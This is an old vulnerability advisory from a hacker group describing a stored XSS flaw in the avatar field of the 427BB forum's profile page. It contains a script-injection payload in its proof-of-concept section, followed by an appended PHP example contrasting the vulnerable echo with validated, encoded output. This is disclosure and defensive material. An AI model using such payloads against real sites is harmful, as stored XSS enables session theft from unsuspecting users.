[][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                               []
[]  HRG - Hackerlounge Research Group            []
[]  Release: HRG006                              []
[]  Monday 03/01/05                              []
[]  427BB                                        []
[]                                               []
[]  The author can't be held responsible for any damage []
[]  done by a reader. You have your own responsibility. []
[]  Please use this document like it's meant to.        []
[][][][][][][][][][][][][][][][][][][][][][][][][][]

Vulnerable: 427BB (Any Version)

---
General Information:

427BB is a simple board and I have no idea why I'm releasing this because it's very unpopular, but what the hell. It's based on PHP and MySQL.

---
Description:

In profile.php there is an avatar field that is vulnerable to an XSS attack by a remote attacker. The avatar string is stored and echoed back without < and > being filtered, so whatever is saved in the field is rendered as HTML every time the profile page is viewed (a stored XSS). This makes it very easy for an attacker to steal a session.

---
PoC Code:

Place the following code into the avatar field and save it, then reload the profile page and it will execute this code.

"><script language="javascript">alert("b00");</script><"

Some more code, this one by Blademaster:

"><"

---
Fix and Vendor status:

Vendor has been notified, expect official patch soon.

---
Greetz:

All the people at hackerlounge.com, JWT, TGS-Security.com and JWT-Security.net.

Specifically: Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, Modzilla, Pingu, Jake Johnson, Afterburn, airo, cardiaC, chis, ComputerGeek, deep_phreeze, dudley, evasion, eXtacy, Mattewan, Afterburn, Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, Slarty, NoUse, Snake (I hate you), Surreal (I hate you), -=Vanguard=-, The_IRS, puNKiey, driedice, Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, voteforpedro, Cryptic_Override, kodaxx, ~CreEpy~NoDquE~, Brainscan, the_exode, phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and anyone else I forgot.

---
Credit:

HRG - Hackerlounge Research Group
http://www.Hackerlounge.com

Partial credit is also given to lancastertechnologies.org, founded by JWT.
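To show what the Description and PoC sections above boil down to from the fixing side, here is an added PHP illustration (not 427BB's own profile.php code): the unfiltered avatar rendering the advisory describes, beside a hardened version that validates the value on save and HTML-encodes it on output. Function names, the 255-character limit and the http/https allowlist are assumptions made for this example.

```php
<?php
// Added example, not code from 427BB. Function names are assumptions;
// the real profile.php form handling is not reproduced here.

// Vulnerable pattern (what the advisory describes): the stored avatar value
// is echoed straight into the src attribute. A value containing "> closes
// the attribute and the <img> tag, and the rest is parsed as markup.
function render_avatar_vulnerable(string $avatar): string
{
    return '<img src="' . $avatar . '" alt="avatar">';
}

// Hardened layer 1, on save: accept only an absolute http(s) URL and
// reject everything else, so markup never reaches the database.
function validate_avatar(string $avatar): ?string
{
    $avatar = trim($avatar);
    if (strlen($avatar) > 255) {                 // assumed length limit
        return null;
    }
    if (filter_var($avatar, FILTER_VALIDATE_URL) === false) {
        return null;                             // not a well-formed URL
    }
    $scheme = strtolower((string) parse_url($avatar, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                             // blocks javascript:, data:, etc.
    }
    return $avatar;
}

// Hardened layer 2, on output: HTML-encode regardless of what is stored, so
// even a value that bypassed validation cannot introduce tags. ENT_QUOTES
// also encodes the quote characters that would terminate the attribute.
function render_avatar_safe(string $avatar): string
{
    $safe = htmlspecialchars($avatar, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<img src="' . $safe . '" alt="avatar">';
}

// Constructed input: the payload quoted in the PoC section of the advisory.
$poc = '"><script language="javascript">alert("b00");</script><"';

echo render_avatar_vulnerable($poc), "\n";     // <script> survives intact
var_dump(validate_avatar($poc));               // NULL: rejected on save
echo render_avatar_safe($poc), "\n";           // &quot;&gt;&lt;script ... inert text
echo render_avatar_safe('https://example.com/a.png'), "\n"; // normal URL unchanged
```

Both layers matter: validation stops bad values entering the database, and output encoding protects rows that were stored before the fix or written through another path.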